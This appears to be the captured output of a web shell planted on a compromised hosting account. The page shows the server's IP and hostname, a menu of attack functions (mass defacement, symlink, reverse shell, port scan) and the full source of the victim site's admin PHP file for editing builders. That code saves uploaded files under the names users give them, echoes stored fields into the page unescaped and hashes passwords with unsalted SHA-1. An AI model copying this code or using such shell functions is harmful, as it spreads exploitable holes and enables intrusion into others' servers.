Tul xxx Tul
User / IP
:
216.73.216.227
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
inmobiliaria
/
admin
/
Viewing: builderedit.php
<?php session_start(); require("config.php"); if(!isset($_SESSION['auser'])) { header("location:index.php"); exit; } $msg=""; $error=""; $uid = isset($_GET['id']) ? (int)$_GET['id'] : 0; if($uid <= 0) { $error = "<p class='alert alert-warning'>Invalid builder id</p>"; } $row = null; if(empty($error)) { $result = mysqli_query($con, "SELECT * FROM user WHERE uid = {$uid} AND utype='builder' LIMIT 1"); if($result && mysqli_num_rows($result) === 1) { $row = mysqli_fetch_assoc($result); } else { $error = "<p class='alert alert-warning'>Builder not found</p>"; } } if(empty($error) && isset($_POST['update'])) { $name = isset($_POST['name']) ? trim($_POST['name']) : ''; $email = isset($_POST['email']) ? trim($_POST['email']) : ''; $phoneInput = isset($_POST['phone']) ? trim($_POST['phone']) : ''; $phoneHasPlus = ($phoneInput !== '' && $phoneInput[0] === '+'); $phoneDigits = preg_replace('/\D+/', '', $phoneInput); $phone = ($phoneHasPlus ? '+' : '') . $phoneDigits; $pass = isset($_POST['pass']) ? trim($_POST['pass']) : ''; $uimage = isset($_FILES['uimage']['name']) ? $_FILES['uimage']['name'] : ''; $temp_name = isset($_FILES['uimage']['tmp_name']) ? $_FILES['uimage']['tmp_name'] : ''; if(!empty($name) && !empty($email) && !empty($phoneInput)) { if(!$phoneHasPlus || !preg_match('/^\+[1-9]\d{7,14}$/', $phone)) { $error = "<p class='alert alert-warning'>Phone number must include country code (example: +573001234567)</p>"; } else { $nameEsc = mysqli_real_escape_string($con, $name); $emailEsc = mysqli_real_escape_string($con, $email); $phoneEsc = mysqli_real_escape_string($con, $phone); $dup = mysqli_query($con, "SELECT 1 FROM user WHERE uemail='{$emailEsc}' AND uid <> {$uid} LIMIT 1"); if($dup && mysqli_num_rows($dup) > 0) { $error = "<p class='alert alert-warning'>Email Id already Exist</p>"; } else { $setPassSql = ""; if($pass !== '') { $passHash = sha1($pass); $passEsc = mysqli_real_escape_string($con, $passHash); $setPassSql = ", upass='{$passEsc}'"; } $setImgSql = ""; if(!empty($uimage) && !empty($temp_name)) { $uimageEsc = mysqli_real_escape_string($con, $uimage); $setImgSql = ", uimage='{$uimageEsc}'"; } $sql = "UPDATE user SET uname='{$nameEsc}', uemail='{$emailEsc}', uphone='{$phoneEsc}'{$setPassSql}{$setImgSql} WHERE uid={$uid} AND utype='builder'"; $updateResult = mysqli_query($con, $sql); if($updateResult) { if(!empty($uimage) && !empty($temp_name)) { if(!empty($row['uimage'])) { @unlink('user/' . $row['uimage']); } move_uploaded_file($temp_name, "user/{$uimage}"); } $msg = "<p class='alert alert-success'>Builder Updated</p>"; header("Location:userbuilder.php?msg=" . urlencode($msg)); exit; } else { $error = "<p class='alert alert-warning'>Builder Not Updated</p>"; } } } } else { $error = "<p class='alert alert-warning'>* Please Fill all the Fields</p>"; } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0"> <title>LM Homes | Builder</title> <!-- Favicon --> <link rel="shortcut icon" type="image/png" href="../images/logo/logo.png"> <!-- Bootstrap CSS --> <link rel="stylesheet" href="assets/css/bootstrap.min.css"> <!-- Fontawesome CSS --> <link rel="stylesheet" href="assets/css/font-awesome.min.css"> <!-- Feathericon CSS --> <link rel="stylesheet" href="assets/css/feathericon.min.css"> <!-- Main CSS --> <link rel="stylesheet" href="assets/css/style.css"> <!-- Modern Admin 2026 CSS --> <link rel="stylesheet" href="assets/css/modern-admin-2026.css"> <!--[if lt IE 9]> <script src="assets/js/html5shiv.min.js"></script> <script src="assets/js/respond.min.js"></script> <![endif]--> </head> <body> <!-- Main Wrapper --> <!-- Header --> <?php include("header.php");?> <!-- /Sidebar --> <!-- Page Wrapper --> <div class="page-wrapper"> <div class="content container-fluid"> <!-- Page Header --> <div class="page-header"> <div class="row"> <div class="col"> <h3 class="page-title">Builder</h3> <ul class="breadcrumb"> <li class="breadcrumb-item"><a href="dashboard.php">Dashboard</a></li> <li class="breadcrumb-item"><a href="userbuilder.php">Builder</a></li> <li class="breadcrumb-item active">Edit</li> </ul> </div> </div> </div> <!-- /Page Header --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h4 class="card-title">Edit Builder</h4> <?php echo $error; ?> <?php echo $msg; ?> </div> <div class="card-body"> <?php if($row) { ?> <form method="post" enctype="multipart/form-data"> <div class="row"> <div class="col-xl-6"> <div class="form-group row"> <label class="col-lg-3 col-form-label">Name</label> <div class="col-lg-9"> <input type="text" class="form-control" name="name" value="<?php echo $row['uname']; ?>" required> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Email</label> <div class="col-lg-9"> <input type="email" class="form-control" name="email" value="<?php echo $row['uemail']; ?>" required> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Contact</label> <div class="col-lg-9"> <input type="tel" class="form-control" name="phone" value="<?php echo $row['uphone']; ?>" placeholder="e.g. +573001234567" required inputmode="tel" maxlength="16" pattern="\+[1-9][0-9]{7,14}" title="Include country code with + and digits only, e.g. +573001234567"> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Password</label> <div class="col-lg-9"> <input type="password" class="form-control" name="pass" placeholder="Leave blank to keep current"> <small>Leave blank to keep current password.</small> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Image</label> <div class="col-lg-9"> <input class="form-control" name="uimage" type="file"> <?php if(!empty($row['uimage'])) { ?> <div style="margin-top:10px;"> <img src="user/<?php echo $row['uimage']; ?>" height="60px" width="60px"> </div> <?php } ?> </div> </div> </div> </div> <div class="text-left"> <input type="submit" class="btn btn-primary" value="Save" name="update"> <a class="btn btn-secondary" href="userbuilder.php">Cancel</a> </div> </form> <?php } ?> </div> </div> </div> </div> </div> </div> <!-- /Main Wrapper --> <!-- jQuery --> <script src="assets/js/jquery-3.2.1.min.js"></script> <!-- Bootstrap Core JS --> <script src="assets/js/popper.min.js"></script> <script src="assets/js/bootstrap.min.js"></script> <!-- Slimscroll JS --> <script src="assets/plugins/slimscroll/jquery.slimscroll.min.js"></script> <!-- Custom JS --> <script src="assets/js/script.js"></script> </body> </html>
Coded With 💗 by
0x6ick